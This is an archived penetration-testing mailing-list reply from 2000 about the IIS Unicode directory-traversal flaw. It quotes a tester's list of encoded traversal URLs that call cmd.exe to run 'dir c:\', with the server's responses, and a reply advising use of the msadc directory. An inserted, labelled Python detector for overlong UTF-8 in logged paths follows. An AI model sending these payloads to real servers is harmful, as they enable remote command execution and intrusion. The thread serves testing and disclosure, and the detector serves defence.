Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Marco <m.v.berkum () obit nl>
Date: Tue, 31 Oct 2000 10:33:16 +0100
Erick Arturo Perez Huemer wrote:
Testing this list on a Spanish NT 4.0 Sp6 machine reveals:

http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

In our test, the InetPub directory is in logical drive D: instead of default C:. Does that matter in the above examples?
Yes... you should use the msadc directory... it's located on the systemdrive. Check my advisory at http://ws.obit.nl/nt.txt

grtz,
Marco
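An added example, not part of the original posts: a Python check a defender could run over request paths taken from web server logs to flag the overlong UTF-8 sequences and malformed percent-escapes seen in the URLs quoted above. The function names are hypothetical, and the paths in the test are constructed from the escape sequences in the thread.

```python
import re

# Smallest code point that legitimately needs an n-byte UTF-8 sequence
# (original 1-6 byte scheme, so the %f8... and %fc... forms are covered).
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}
LEADS = [(0xE0, 0xC0), (0xF0, 0xE0), (0xF8, 0xF0), (0xFC, 0xF8), (0xFE, 0xFC)]

def percent_bytes(path):
    """Return (raw bytes, malformed escapes) for a percent-encoded path."""
    out, bad, i = bytearray(), [], 0
    while i < len(path):
        if path[i] == "%":
            pair = path[i + 1:i + 3]
            if re.fullmatch(r"[0-9A-Fa-f]{2}", pair):
                out.append(int(pair, 16))
                i += 3
                continue
            bad.append(path[i:i + 3])   # e.g. "%pc": not two hex digits
        out += path[i].encode("utf-8")
        i += 1
    return bytes(out), bad

def seq_len(lead):
    """Sequence length implied by a UTF-8 lead byte, or 0 if not a lead."""
    for n, (mask, val) in enumerate(LEADS, start=2):
        if lead & mask == val:
            return n
    return 0

def find_overlong(path):
    """List (hex bytes, code point) for every overlong UTF-8 sequence."""
    raw, _ = percent_bytes(path)
    hits, i = [], 0
    while i < len(raw):
        n = seq_len(raw[i])
        tail = raw[i + 1:i + n]
        if n and len(tail) == n - 1 and all(b & 0xC0 == 0x80 for b in tail):
            cp = raw[i] & (0xFF >> (n + 1))      # payload bits of lead byte
            for b in tail:
                cp = (cp << 6) | (b & 0x3F)
            if cp < MIN_CP[n]:                    # shorter encoding exists
                hits.append((raw[i:i + n].hex(), cp))
            i += n
        else:
            i += 1
    return hits

def inspect(path):
    """Summarise both findings for one logged request path."""
    return {"overlong": find_overlong(path), "malformed": percent_bytes(path)[1]}
```

The check requires well-formed continuation bytes, so a lead byte followed by a non-continuation byte (as in `%c1%1c`) is not reported as overlong.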
Current thread:
- Re: [PEN-TEST] IIS UNICODE Strings Marco (Nov 01)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Unicraft Systems (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Moonen, Ralph (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)